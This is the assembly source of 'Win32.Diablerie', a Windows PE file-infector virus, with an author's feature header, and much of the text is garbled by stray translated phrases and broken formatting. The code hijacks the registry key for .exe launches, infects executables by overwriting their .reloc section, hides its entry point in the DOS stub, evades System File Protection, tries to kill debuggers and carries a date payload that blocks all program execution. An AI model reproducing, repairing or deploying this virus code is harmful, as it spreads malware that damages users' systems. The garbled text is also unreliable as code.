Comment $
Where is I am I am?
Win32.Diablerie?
Where is?
Where is this? Where is it?
Version: 0.7
Author: Dr. Watcom
Compiler: Borland Turbo Assembler (Version 5.0R / 32bit)
TYPE: PE-Infector (Relocations overwriter)
Platform: Intel 80386 Processor and Compatibles
Systems: Win95, Win98, WinMe, Winnt, Win2k
Size: 2848 bytes
Sys Hooking: Changes 'EXEFILE' Registry Key to TRAP EXE FILES Execution
Encryption: Not Implement (May Be Next Version ...)
EPO: Virus Code Is Run from a Loader Withnin STUB, Using SEH
Anti-av: not import.
Anti-Bait: Does Not Infect Tiny Files (with relocations Anti-Debug: Detects App-Level Debuggers, Tries To Kill Them with SEH PayLoad: on 01/11 Denies All Program Execution, Shows Credits . This is my second virus and it's a bit lame yet, AS IT HAS NO POLYMORPHIC ENGINE AND EVEN Uses No Encryption, But I Think IT IMPLEMENTS A Couple of Nifty Things: IT Obscures The Entrypoint By Clearing It in The Header, So The Victims Get Executed from The Very Begging of The File (Including the 'MZ' Signature !!) AND THEN JMP to a Loader Located in The Dos Stub Code, Which IS Redone to Keep Compatibility (SO Running Victims Under MS-DOS Gives no error). This loader Passs Control to the Virus Using A SEH FRAME TO JMP. The Virus Changes The 'HKCR / EXEFILE / Shell / Open / Command' Key To Trap Any Program Which Gets Executed, and Then Infects IT by Overwriting .reloc Section. It Also Detects (and Tries To Kill) Application-Level Debuggers. THE PAYLOAD IS VERY LAME: Only ail 'Message Box Showing The Credits and Denying All Program Execution On 01/11. The payload TEXT (AS THE Virus Name) WAS INSPIRED BY The RoLPLAYING GAME "Vampire: The masquerade" (of Course, The * Real * Game, NOT THE Computer one !! .Compilation. (Why Would Anybody Want To Compile this?) Tasm32 / m / ml diablerie.asm TLINK32 / TPE / AA / C DIABLERIE.OBJ, DIABLERIE.EXE, IMPORT32.LIB Pewrite Diablerie.exe $ 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 :? Preprocessor? ; Tangyu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun. .386; instruction set to be used .Model flat; no segmentation! Include Win32.inc; Windows Structures and Constants INCLUDE MZ_PE.INC; DOS (MZ) & Win32 (PE) EXE LAYOUT EXTRN EXITPROCESS: Proc; Some Apis Used by Fake Host Code EXTRN MessageBoxa: proc; EXTRN_WSPRINTFA: PROC Where is 谀 哪? Where is Xomo? ; Useful equates and macros? Where is it? Where is Xiyuomi? Where is the abuse? Where is Xiyomo? Debug Equ true; True -> Do Not Infect Files CRLF EQU <13, 10> SPAWN_NAME EQU <'MSDIAB.EXE'> Virus_name EQU <'Win32.Diablerie'> Virus_version EQU <'V0.7'> Virus_size equ end - start Opcode_jmp_short Equ 0ebh PayLoad_Month EQU 11 PayLoad_day EQU 1 KERNEL32_WIN9X EQU 0BFF70000H; Hardcoded Values, In Case We don't KERNEL32_WINNT EQU 077F00000H; Find kernel32 by Other Ways. Those KERNEL32_WIN2K EQU 077E00000H; Values Are Ten Checked Using SEH KERNEL32_WINME EQU 0BFF60000H; Before Using Them, To Avoid Pf's API Macro Name Call [EBP NAME] ENDM PUT_SEH_HANDLER MACRO LABEL Local @@ Skip_Handler Call @@ Skip_Handler MOV ESP, [ESP 08H] JMP Label @@ Skip_Handler: XOR EDX, EDX Push DWORD PTR FS: [EDX] MOV DWORD PTR FS: [EDX], ESP ENDM Restore_seh_handler macro XOR EDX, EDX POP DWORD PTR FS: [EDX] POP EDX ENDM Generate_Exception Macroxor EDX, EDX Div EDX ENDM Strlen Macro Push EAX PUSH ESI Push EDI Mov EDI, ESI XOR ECX, ECX Dec ECX XOR EAX, EAX Repne scaSB MOV ECX, EDI Sub ECX, ESI POP EDI POP ESI POP EAX ENDM 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 Host Data? ; Tangyu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun. THIS DATA IS Used Only by First-Generation Fake Host Code .DATA Sztitle DB Virus_name, 0 SzTemplate DB 'Virus', Virus_Name, '', Virus_Version, '', 'Has Been Activated.', CRLF DB 'Current Virus Size IS% I Bytes (0x% X Bytes).', CRLF, CRLF DB 'Have a nice day.', 0 SZBAIT DB 'Bait1.exe', 0 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 ;? Virus code? ; Tangyu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun. .code Start: What is 谀? ;? Setup everything? Where is the destitute? Where is the abortion? Call getdelta; trivial stuff, don't you think? GetDelta:; OK, I'll Explain: this way you can POP EBP; get the code displacement (a.k.a. Sub EBP, OFFSET GETDELTA; DELTA OFFSET Test EBP, EBP JZ FirstGenentry MOV ESP, [ESP 08H] Restore_seh_handler MOV EAX, [EBP FILE_ENTRYPOINT]; Original EP (Saved During Infection) MOV [EBP HOSTENTRY], EAX; Store IN A Safe Place Firstgenentry: CLD; We don't like surprises ... Mov ESI, [ESP]; To Find Kernel32 We Will Use T Call Findkernel32; RET Address in the stack, wich JC Returntohost; (Hopefully) Will Point Into IT Call LocateApis JC Returntohost Push size process_information; Push GMEM_FIXED or GMEM_ZEROINIT; API GLOBALLOC; MOV [EBP ProcessInfo], EAX; Push size startupinfo; Push GMEM_FIXED or GMEM_ZEROINIT; API GLOBALLOC; MOV [EBP STARTUPINFO], EAX; Mov [eax.si_size], Size Startupinfo Push EAX API GetStartupinfo; Get Our Startup Information Test EBP, EBP JZ Fakehost What is it? ;? Hands on !!! Where is it? Where is the abortion? Call RNG_INIT; INIT The Random Number Generator Call detectdebuggers JC Returntohost Call ParseCommandline JNC EXECUTEDFROMREG Call setupReghook JMP Returntohost ExecuteFromReg: MOV ESI, [EBP CMDexefile] IF Debug Push 1040h Lea Edx, [EBP SZVIRUSNAME] Push Edx PUSH ESI Push null API MessageBox Else Call infectfile ENDIF SUB ESP, Size SystemTime MOV ESI, ESP PUSH ESI API GetSystemTime Add ESP, Size SystemTime CMP [ESI.ST_MONTH], payload_month JNE EXECUTEVICTIM CMP [ESI.ST_DAY], PayLoad_day JNE EXECUTEVICTIM Push 1040h Lea Edx, [EBP SZVIRUSNAME] Push Edx Lea Edx, [EBP SZVIRUSCREDITS]] Push Edx Push null API MessageBox IF Debug Else JMP EXITTOWINDOWS ENDIF Executevictim: MOV ESI, [EBP CMDspAwn]; MOV EBX, [EBP ProcessInfo]; Must Execute Our Command Line MOV EDX, [EBP Startupinfo]; AS A New Process XOR EAX, EAX Push EBX Push Edx Push EAX Push EAX Push EAX Push EAX Push EAX Push EAX PUSH ESI Push EAX API CREATEPROCESS Exittowindows: PUSH 0 API EXITPROCESS_ Returntohost: Test EBP, EBP JZ Fakehost_quit Push [EBP HOSTENTRY] RET 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 ; Virus Subroutines? ; Tangyu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun. DetectDebuggers Findkernel32 LocateApis ParseCommandline SetupReghook What is it? DETECTDEBUGGERS? Where is it? What is it? Where is the abuse? Detects Application-Level Debuggers and Tries to Kill Them with SEH; Output: Carry flag -> set if debugger Persists, Clear IF NOT DetectDebuggers: Pushhad PUT_SEH_HANDAL FD_CONTINUE; Use SEH TO KILL Debuggers XOR Eax, Eax; Generate A Exception (Divide By 0) Div EAX; Restore_seh_handler; Here Some Abnormal Occured JMP fd_debugger_found; so lets quit FD_CONTINUE:; Execution SHOULD RESUME AT THIS PNT Restore_seh_handler; Remove Handler Mov Eax, FS: [20h]; Detect Application-Level Debugger TEST EAX, EAX; is present? JNZ FD_DEBUGGER_FOUND; Quit! Popad; No Debuggers Found, So Restore Clc; Registers, Clear Carry Flag and Ret; return! FD_DEBUGGER_FOND: Popad STC RET What is it? Findkernel32 charm? What is it? What is it? Where is the abortion? Tries to find kernel32 base address by scanning back from a certain address ; and, if That fails, by using some hardcoded value ; Input: ESI -> Must Point Somewhere Into Kernel32 Output: ; var kernel32-> Will Point to kernel32 base address Carry flag -> set on error Findkernel32: Pushhad And ESI, 0FFFFF0000h MOV ECX, 100H FK32_LOOP: Call Tryaddress JNC FK32_SUCCESS SUB ESI, 010000H Loop fk32_loop FK32_hardcodes: Mov ESI, KERNEL32_WIN9X Call Tryaddress JNC FK32_SUCCESS MOV ESI, KERNEL32_WINNT Call Tryaddress JNC FK32_SUCCESS Mov ESI, kernel32_win2k Call Tryaddress JNC FK32_SUCCESS Mov ESI, KERNEL32_WINME Call Tryaddress JNC FK32_SUCCESS FK32_fail: Popad STC RET FK32_SUCCESS: MOV [EBP KERNEL32], ESI Popad CLC RET What is it? ;? LocateApis? Where is the abuse? What is the abortion? Gets All API Addresses That Our Virus Needs ; Output: Carry flag -> set on Error, Clear on SUCCESS LocateApis: Pushhad MOV EBX, [EBP KERNEL32]; HAVING FOUND KERNEL32, WE WILL GETLEA ESI, [EBP KERNEL_API_CRC32]; An Array Of API Addresses by THEIR LEA EDI, [EBP KERNEL_API_ADDR]; Names CRC32, Scanning The Kernel32 Call getapiarray; export table JC la_fail; Lea Edx, [EBP SZUSER32]; More Api's! This Time We Call Push Edx; LoadLibrary TO GET USER32 API LoadLibrary; Call API MOV EBX, EBX; EBX -> Module Handle Lea ESI, [EBP USER_API_CRC32]; ESI -> Pointer to CRC32 TABLE Lea EDI, [EBP User_API_ADDR]; EDI -> Where to Store Addresses Call getapiarray; Call Our Procedure JC la_fail; Any Problem? if So, Bail Out Lea Edx, [EBP SZADVAPI32]; more API's! Push EDX; API loadLibrary; MOV EBX, EAX; Lea ESI, [EBP Advapi_API_CRC32]; Lea EDI, [EBP Advapi_API_ADDR]; Call getapiarray; JC la_fail; Any Problem? if So, Bail Out La_success: Popad CLC RET La_fail: Popad STC RET What is 谀? ;? ParseCommandline charm? Where is the destitute? Where is the abortion? ; Parses Our CommandLine and Checks for Special Params ; Output: VAR CMDLINE VAR cmdspawn Var cmdexefile Carry flag -> set if no special param found, Clear Otherwise PARSECMMAndline: Pushhad XOR EAX, EAX MOV [EBP CMDSPAWN], EAX MOV [EBP CMDEXEFILE], EAX API getcommandline; get outcomman MOV [EBP CMDLINE], EAX; Save IT Mov ESI, EAX; Call getnextParam; JC PCL_QUIT; Lodsb Dec Al JNZ PCL_QUIT MOV [EBP CMDSPAWN], ESI Strlen Push ECX Push GMEM_FIXED API GLOBALLOC MOV [EBP CMDEXEFILE], EAX Mov Edi, EAX Strlen REP MOVSB MOV ESI, [EBP CMDexefile] Call getNextParam JC PCL_QUIT Dec ESI MOV Byte Ptr [ESI], 0 Popad CLC RET PCL_QUIT: POPAD STC RET What is it? ?? SetupReghook Mei? What is it? What is it? Where is the abortion? Copies Our Host to Windows Directory and Changes The 'EXEFILE' KEY IN REG SetupReghook: Pushhad SUB ESP, MAX_PATH MOV ESI, ESP SUB ESP, MAX_PATH MOV EDI, ESP PUSH MAX_PATH Push EDI API GetWindowsDirectory Lea Edx, [EBP SZSPAWNFILE] Push Edx Push EDI API LSTRCAT PUSH MAX_PATH PUSH ESI Push null API getModuleFileName Push False Push EDI PUSH ESI API COPYFILE Lea ESI, [EBP SzregValue] Lea EDI, [EBP Szregkey] Mov Edx, HKEY_CLASS_ROOT Call ChangeRegstring Add ESP, MAX_PATH MAX_PATH Popad RET 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 ;? Virus functions? ; Tangyu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun. ChangeRegstring GetApiaddress Getapiarray GetCrc32 GetNextParam Tryaddress What is it? ;? CHANGEREGSTRING Mei? Where is it? What is it? Where is the abuse? ; SHORTCUT TO CHANGE A Registry String ; Input: ; EDI -> Pointer to Key To Be Changd ESI -> Pointer to Key Value ; EDX -> HotKey Changeregstring: Pushhad SUB ESP, 4 MOV EBX, ESP Push EBX Push Key_All_Access PUSH 0 Push EDI Push Edx API RegopenKeyex Strlen Dec ECX Push ECX PUSH ESI Push reg_sz Push null Push DWORD PTR [EBX] API RegSetValue Push DWORD PTR [EBX] API Regclosekey Add ESP, 4 Popad RET Where is it? Getapiaddress charm? Where is it? What is it ?? Where is the abortion? Tries to get an API Address by its crc32 from the given module export table ; Input: ESI -> Module Handle Edx -> API's CRC32 Output: EAX -> API's Address Carry flag -> set on Error, Clear on SUCCESS Getapiaddress: Pushhad Mov EDI, ESI Add ESI, [EDI.MZ_LFANEW] Add ESI, 078H Lodsd Add Eax, EDI Mov ESI, EAX Mov Eax, [ESI.ed_NumberOfnames]] MOV [EBP ET_MAXNAMES], EAX MOV EAX, [ESI.ed_addressofnames] Add Eax, EDI MOV [EBP ET_PTRNAMES], EAX Mov Eax, [ESI.ed_addressoffunctions] Add Eax, EDI MOV [EBP ET_PTRADDRESSSS], EAX Mov Eax, [ESI.ed_addressOfNameRDINALS] Add Eax, EDI MOV [EBP ET_PTRORDINALS], EAX MOV ESI, [EBP ET_PTRNAMES]] MOV ECX, [EBP ET_MAXNAMES]] XOR EAX, EAX MOV [EBP Count], EAX GA_GETNAMEPTR: JECXZ GA_FAIL Lodsd PUSH ESI Add Eax, EDI Mov ESI, EAX XOR EBX, EBX Push ECX Strlen Call getCrc32 POP ECX CMP EAX, EDX JNE GA_NEXT MOV ECX, [EBP Count] MOV ESI, [EBP ET_Ptrordinals] SHL ECX, 1 Add ESI, ECX XOR EAX, EAX Lodsw Mov ESI, [EBP ET_PTRADDRESSESSSSS]] SHL EAX, 2 Add ESI, ESI Lodsd Add Eax, EDI MOV [EBP ET_TMPADDRESS], EAX JMP GA_SUCCESS GA_NEXT: POP ESI Dec ECX INC [EBP Count] JMP GA_GETNAMEPTR GA_SUCCESS: POP ESI Popad MOV EAX, [EBP ET_TMPAddress] CLC RET GA_FAIL: Popad STC RET What is it? Getapiarray? Where is it? Where is the abortion? Gets an Array of Api Addresses from the given module ; Input: ESI -> Points to an array of crc32 values, Ending with a null dword EDI -> Points to Destination of the Address Array EBX -> Module Handle Output: Carry flag -> set on Error, Clear on SUCCESS Getapiarray: Pushhad GAA_LOOP: Lodsd Test Eax, EAX JZ GAA_SUCCESS Mov Edx, EAX PUSH ESI MOV ESI, EBX Call getapiaddress JC GAA_FAIL Stosd POP ESI JMP GAA_LOOP GAA_SUCCESS: Popad CLC RET GAA_FAIL: Popad STC RET What is it? ;? GetCrc32 charm? What is the abutment? Where can you get? COMPUTES CRC32 Checksum of The Given Data ; Input: ESI -> Pointer to Data ECX -> Size of data in bytes; Output: EAX -> CRC32 Checksum GetCrc32: Pushhad Mov Edi, ECX XOR ECX, ECX Dec ECX MOV EDX, ECX CRC32_NEXTBYTE: XOR EAX, EAX XOR EBX, EBX Lodsb XOR Al, Cl MOV CL, CH MOV CH, DL MOV DL, DH MOV DH, 8 CRC32_NextBit: SHR BX, 1 RCR AX, 1 JNC CRC32_NOCRC XOR AX, 08320H XOR bx, 0edb8h CRC32_NOCRC: DEC DH JNZ CRC32_NEXTBIT XOR ECX, EAX XOR EDX, EBX Dec Edi JNZ CRC32_NEXTBYTE Not Edx NOT ECX MOV EAX, EDX ROL EAX, 16 MOV AX, CX MOV [EBP CRC32], EAX Popad MOV EAX, [EBP CRC32] RET What is it? ?? GetNextParam? What is it? What is it? Where is the abortion? ; Moves ESI Pointer to Next Parameter In a CommandLine-Type String Uses SEH TO AVOID POSIBLE PROTECTION FAULTS ; Input: ; ESI -> Pointer to a commandline-type string ; Output: ESI -> Points to Next Parameter Carry flag -> set if string terminated, Clear on SUCCESS GetNextParam: Push EAX Push ECX PUT_SEH_HANDLER GNP_FAIL MOV CL, 20H; Character to Match (Space) GNP_SKIPSPACES: Lodsb; TEST Al, Al; JZ GNP_FAIL; if Al is Zero, String Was Terminated CMP Al, CL; Je gnp_skipspaces; there is recent spacs, loop ON CMP Al, 22H; First CHAR IS A Quote? JNE GNP_FIND; NO: WE MUST FIND A SPACE MOV CL, 22H; YES: WE MUST FIND The Closing Quote GNP_Find: Lodsb Test Al, Al JZ GNP_FAIL CMP AL, CL JNE GNP_FIND Restore_seh_handler POP ECX POP EAX CLC RET GNP_fail: Restore_seh_handler POP ECX POP EAX STC RET What is it? :? Tryaddress? Where is the abuse? What is the abortion? Checks if ESI Points to a Valid Pe Base Address (useful to find kernel32), Uses SEH TO AVOID POSSIBLE FAULTS, SO The Address May Be Anything ; Input: ESI-> Address to try Output: Carry flag -> set on Error, Clear on SuccessTryAddress: Pushhad PUT_SEH_HANDLER TA_FAIL CMP Word PTR [ESI], 'ZM' JNE TA_FAIL Add ESI, [ESI.MZ_LFANEW] CMP Word PTR [ESI], 'EP' JE TA_SUCCESS TA_SUCCESS: Restore_seh_handler Popad CLC RET TA_FAIL: Restore_seh_handler Popad STC RET 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 :? Randomizing functions? ; Tangyu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun. What is it? ;? RNG_INIT Mei? What is the abutment? Where can you get? Initialise the Random Number Generator ; RNG_INIT: Pushhad API GettickCount MOV [EBP RNDSEED_1], EAX ROL Eax, 3 MOV [EBP RNDSEED_2], EAX ROL Eax, 3 MOV [EBP RNDSEED_3], EAX ROL Eax, 3 MOV [EBP RNDSEED_4], EAX ROL Eax, 3 MOV [EBP RNDSEED_5], EAX ROL Eax, 3 MOV [EBP RNDSEED_6], EAX Popad RET Where is it? ;? RNG_GETRANDOM ME? Where is it? What is it ?? Where is the abortion? RETURNS A 32-bit Random Number ; Output: EAX -> Random Number RNG_GETRANDOM: Push Edx MOV EAX, [EBP RNDSEED_1] Mov Edx, [EBP RNDSEED_2] XOR EAX, [EBP RNDSEED_3] XOR EDX, [EBP RNDSEED_4] SHRD EAX, EDX, 11H Push EAX MOV EAX, [EBP RNDSEED_5] MOV EDX, [EBP RNDSEED_6] And Eax, 0FFFFFFEH Add [EBP RNDSEED_1], EAX ADC [EBP RNDSEED_2], EDX INC DWORD PTR [EBP RNDSEED_3] Inc DWORD PTR [EBP RNDSEED_4] POP EAX POP EDX RET Which is it? ?? RNG_GETRANDOMRANGE? What is it? What is it? What is it? Where is the abortion? Returns a Random Number from 0 to [EAX - 1] ; Input: EAX -> Maximum Random Number To Get 1 ; Output: EAX -> Random Number RNG_GETRANDOMRANGE: Push EBX MOV EBX, EAX Call RNG_Getrandom RNG_R_LOOP: CMP EAX, EBX; Now, Keep Result in the Given Range JL RNG_R_OK; It's in Range, So We Can Returnshr Eax, 1; It's Not. We Divide IT by 2 and JMP RNG_R_LOOP; Loop To Compare Again RNG_R_OK: POP EBX Ret; return! 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 ; InFection code? ; Tangyu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun. What is it? Infectfile? Where is the abuse? What is the abortion? ; Infects a portable executable by overwriting .reloc section ; Input: ESI -> Points to FileName to Infect ; Infectfile: Pushhad MOV [EBP FileName], ESI MOV [EBP FILINFECTED], FALSE Mov EDI, ESI Mov ECX, MAX_PATH XOR EAX, EAX CLD RepNZ scaSB MOV EAX, [EDI-5] OR EAX, 20202000H CMP EAX, 'EXE.' JNE IF_QUIT Avoid System File Protection Where is the abortion? Where is Xombey? Lea EDX, [EBP SZSFC]; We Have to Avoid Win2k / WinMe SFP Push Edx; Push a Pointer To Library Name API LoadLibrary; loading it Test Eax, Eax; if The Library Doesn't EXIST, WE JZ if_notprotected; Can Safely Ignore SFP Lea Edx, [EBP SZSFCPROC]; Pointer To Function Name Push EDX; Push IT Push Eax; Push Module Handle API GetProcaddress; Call API Test Eax, Eax; No Function with That Name, SO WE JZ if_notprotected; Proceed to Infection Push ESI; Pointer to Victim's FileName Push null; this parameter must be null Call Eax; Call SfcisfileProtected Test Eax, Eax; NOT Protected? Go Ahead, Continue JZ if_notprotected; with infection JMP if_quit; File Protected, WE Must Quit ; Save file attributes and remove them Where is the abortion? Where is Xombexto know? IF_notprotaced: Push ESI; POINTS to FileName API getFileAttributes; Call API MOV [EBP FileAttribs], EAX; Save Attributes for Later USE Push file_attribute_normal; now we change the attributes of there Push ESI; File to File_Attribute_normalalapi setfileAttribute; Call API Open a Handle to the File Where is the abuse? IF_OpenFile: XOR EAX, EAX Push EAX Push EAX Push Open_EXISTING Push EAX Push file_share_read Push generic_read or generic_write PUSH ESI API CREATEFILE INC EAX JZ if_restorettribs Dec EAX MOV [EBP FILEHANDLE], EAX ; Save Creation / Access / Modify Times Where is the abortion? Where is Xomo know? Where is it? Lea Edx, [EBP FileTime_Written] Push Edx Lea Edx, [EBP FileTime_accessed] Push Edx Lea Edx, [EBP FileTime_created] Push Edx Push [EBP FILEHANDLE] API GetFileTime ; Save File Size Where is the abortion? Push null Push [EBP FILEHANDLE] API GetFileSize MOV [EBP FileSize], EAX Open a file mapping object Where is the abuse? Where is Xomo? IF_createmapping: XOR EAX, EAX Push EAX Push [EBP FileSize] Push EAX Push Page_Readwrite Push EAX Push [EBP FILEHANDLE] API CREATEFILEMAPPING Test Eax, EAX JZ if_closefile MOV [EBP FILEMAPPING], EAX Map a view of the file Where is the abortion? IF_createview: XOR EAX, EAX Push DWORD PTR [EBP OFFSET FileSize] Push EAX Push EAX Push file_map_all_access Push [eBP filemapping] API MapViewoffile Test Eax, EAX JZ if_closemapping MOV [EBP FILEVIEW], EAX Mov ESI, EAX Check for MZ / PE SIGNATIS Where is the abuse? Where is Xomo? CMP Word PTR [ESI], 'ZM' JNE IF_Closemapping Add ESI, [ESI.MZ_LFANEW] CMP Word PTR [ESI], 'EP' JNE IF_Closemapping Check for Space for the EPO Loader Where is the abuse? MOV ESI, [EBP FILEVIEW] Mov EDI, ESI Add ESI, [ESI.MZ_LFANEW] SUB ESI, EDI SUB ESI, SIZE Image_DOS_HEADER CMP ESI, SIZE_EPO_LOADER JL if_closeview ; Find '.reloc' Section Where is the abortion? MOV ESI, [EBP FILEVIEW] Add ESI, [ESI.MZ_LFANEW] Movzx Eax, Word Ptr [ESI.FH_NUMBEROFSECTIONS]] MOV [EBP File_SEctions], EAX Add ESI, SIZE_FILE_HEADER Mov Eax, [ESI.OH_IMAGEBASE] MOV [EBP FILE_IMAGEBASE], EAX Mov Eax, [ESI.OH_ADDRESSOFENTRYPOINT] Add Eax, [EBP FILE_IMAGEBASE] MOV [EBP FILE_ENTRYPOINT], EAX Mov Eax, [ESI.OH_Numberofrvaandsizes] Imul ECX, EAX, SIZE Image_DATA_DIRECTORY Add ESI, SIZE_OPTIONAL_HEADER Add ESI, ECX MOV EAX, [EBP File_SEctions] IF_TRYSECTION: CMP DWORD PTR [ESI], 'Ler.' JNE IF_NEXTSECTION Add ESI, 2 CMP DWORD PTR [ESI], 'Cole' JNE IF_NEXTSECTION SUB ESI, 2 JMP if_foundrelocs IF_NEXTSECTION: Dec EAX Test Eax, EAX JZ if_closeview Add ESI, SIZE_SECTION_HEADER JMP if_trysection IF_Foundrelocs: CMP [ESI.SH_SIZEOFRAWDATA], Virus_Size JL if_closeview CMP [ESI.SH_CHARACTERISTICS], / Image_scn_cnt_code or image_scn_mem_execute or image_scn_mem_write JE if_closeview MOV [EBP File_SECTIONHEADER], ESI Mov Eax, [ESI.SH_VIRTUALADDRESS] MOV [EBP File_SECTIONRVA], EAX Mov Eax, [ESI.SH_POINTERTORAWDATA] MOV [EBP File_SECTIONRAW], EAX Mov Eax, [ESI.SH_SIZEOFRAWDATA] MOV [EBP File_SEctionsize], EAX ; Copy Virus Body Where is the abortion? IF_copyvirusbody: Mov Edi, [EBP File_SECTIONRAW] Add Edi, [EBP FILEVIEW] Lea ESI, [EBP START] MOV ECX, Virus_Size CLD REP MOVSB MOV ECX, [EBP File_SEctionsize] Sub ECX, Virus_size XOR EAX, EAX Rep Stosb Insert EPO Loader Into Dos Header / Stub Where is the abortion? IF_INSERTLOADER: XOR EAX, EAX MOV EDI, [EBP FileView]; Start of File MOV [edi.mz_ip], ax; clear dos entry point MOV [edi.mz_lfarlc], ax; clear dos relocationsadd edi, 2; skip 'mz' Signature Mov al, opcode_jmp_short; setup a jmp silk Stosb; Insert JMP Short Opcode Mov Eax, size image_dos_header; Calc Destination: After MZ Header Add Eax, 2; Skipping First 2 bytes of Code SUB Al, 4; But Relative to Next Eip! Stosb; INSERT Displacement Byte MOV EAX, [EBP File_ImageBase]; Calculate Virus Entry Point: Add Eax, [EBP File_SECTIONRVA]; Image Base Virus Section RVA Lea Edx, [EBP Entrypoint]; Save Virus Entry Point Into Our MOV [EDX], EAX; Loader Code MOV EDI, [EBP FileView]; Start of File Add Edi, Size Image_DOS_HEADER; Go Beyond Mz Header Lea ESI, [EBP EPOLOADER]; Address of Our Loader Code MOV ECX, SIZE_EPO_LOADER; SIZE OF CODE Rep Movsb; Store It! Update headers Where is the abortion? If_updateheaders: MOV EDI, [EBP FILEVIEW] Add edi, [edi.mz_lfanew] Add Edi, Size Image_File_Header XOR Eax, Eax; Clear Entry Point (Reset to Zero) MOV [edi.oh_addressofentryPoint], EAX MOV ESI, [EBP File_SECTIONHEADER] MOV [ESI.SH_CHARACTERISTICS], / Image_scn_cnt_code or image_scn_mem_execute or image_scn_mem_write MOV [EBP FILINFECTED], TRUE; Infection Complete Unmap the view Where is the abortion? IF_closeview: Push [EBP FILEVIEW] API UnmapViewoffile Close the file mapping object Where is the abuse? Where is Xomo know? Where is? IF_closemapping: Push [eBP filemapping] API CloseHandle Close The File Handle, Restore Times Where is the abortion? Where is Xombexto know? IF_closefile: IF Debug Push [EBP FILEHANDLE] API CloseHandle Else Lea Edx, [EBP FileTime_Written] Push Edx Lea Edx, [EBP FileTime_accessed] Push Edx Lea Edx, [EBP FileTime_created] Push Edxpush [EBP FILEHANDLE] API setFiletime Push [EBP FILEHANDLE] API CloseHandle ENDIF Restore the file attributes Where is the abuse? Where is Xiyomo? IF_RESTOREATTRIBS: Push [EBP FileAttribs]] Push [EBP FileName] API setFileAttributes IF_quit: Popad RET 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 ;? EPO - STUB Program? ; Tangyu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun. Code to Replace Victim's Dos Stub ; Epoloader: DB 0ebh; JMPS ... DB MSDOS_CODE-WIN32_CODE; (Relative Displacement) WIN32_CODE: DB 052H; Push EDX DB 045H; INC EBP DB 068H; Push ... EntryPoint: DD 000000000H; DB 033H, 0C0H; XOR EAX, EAX DB 064H, 0FFH, 030H; Push FS: [EAX] DB 064H, 089H, 020H; MOV FS: [EAX], ESP DB 0F7H, 0F0H; DIV EAX MSDOS_CODE: DB 0BAH; MOV DX ... DW MSDOS_STRING-EPOLOADER; (Offset String) DB 00EH; PUSH CS DB 01FH; POP DS DB 0B4H, 009H; MOV AH, 09 DB 0CDH, 021H; INT 21 DB 0B8H, 001H, 04CH; MOV AX, 04C01 DB 0CDH, 021H; INT 21 MSDOS_STRING: ; DB 'this Program Requires Microsoft Windows.' DB 'this Program Cannot Be Run in dos mode.' ; DB 'this Program Must Be Run Under Win32.' AARGH! I NEED More Space! DB 'this Program Needs Win32' DB CRLF, '$', 0 EPOLOADER_END: SIZE_EPO_LOADER EQU EPOLOADER_END - EPOLOADER 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 ;? Virus Data? ; Tangyu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun. KERNEL32 DD 00H Hostentry DD 00H CRC32 DD 00H Key32 DD 00H Count DD 00H STARTUPINFO DD 00H ProcessInfo DD 00H CMDline DD 00H Cmdspawn DD 00H Cmdexefile DD 00H RNDSEED_1 DD 00H RNDSEED_2 DD 00H RNDSEED_3 DD 00H RNDSEED_4 DD 00H RNDSEED_5 DD 00HRNDSEED_6 DD 00H Export Table Data ; ------------------------------- ET_MAXNAMES DD 00H ET_PTRNAMES DD 00H ET_PTRADDRESSES DD 00H ET_PTRORDINALS DD 00H ET_TMPADDRESS DD 00H Infection Data ; ------------------------------- FILENAME DD 00H FileAttribs DD 00H FILSIZE DD 00H FileHandle DD 00H Filemapping DD 00H FileView DD 00H Filetime_created DD 00h, 00h Filetime_accessed DD 00h, 00h Filetime_Written DD 00h, 00h FILE_IMAGEBASE DD 00H FILE_ENTRYPOINT DD 00H File_sections DD 00H FILE_SECTIONHEADER DD 00H File_sectionsize dd 00h FILE_SECTIONRAW DD 00H FILE_SECTIONRVA DD 00H FileInfected DD 00H KERNEL_API_CRC32: _Exitprocess DD 040F57181H _CreateProcess DD 0267E0B05H _LoadLibrary DD 04134D1ADH _GetProcaddress DD 0FFC97C1FH _GlobalAlloc DD 083A353C3H _GetModuleFileName DD 004DCF392H _GetStartupinfo DD 052CA6A8DH _GetCommandline DD 03921BF03H _GetWindowsDirectory DD 0FE248274H _CloseHandle DD 068624A9DH _Createfile DD 08C892DDFH _CreateFilemapping DD 096B2D96CH _MapViewoffile DD 0797B49ECH _UnmapViewoffile DD 094524B42H _GetfileAttributes DD 0C633D3DEH _SETFILEATTRIBUTES DD 03C19E536H _GetfileSize DD 0ef7D811BH _Getfiletime DD 04434E8FEH _SETFILETIME DD 04B2A3E7DH _CopyFile DD 05BD05DB1H _GettickCount DD 0613FD7BAH _GetsystemTIME DD 075B7EBE8H _SLEP DD 00ac136BAH _LSTRCAT DD 0C7DE8BACH DD 00000000h KERNEL_API_ADDR: 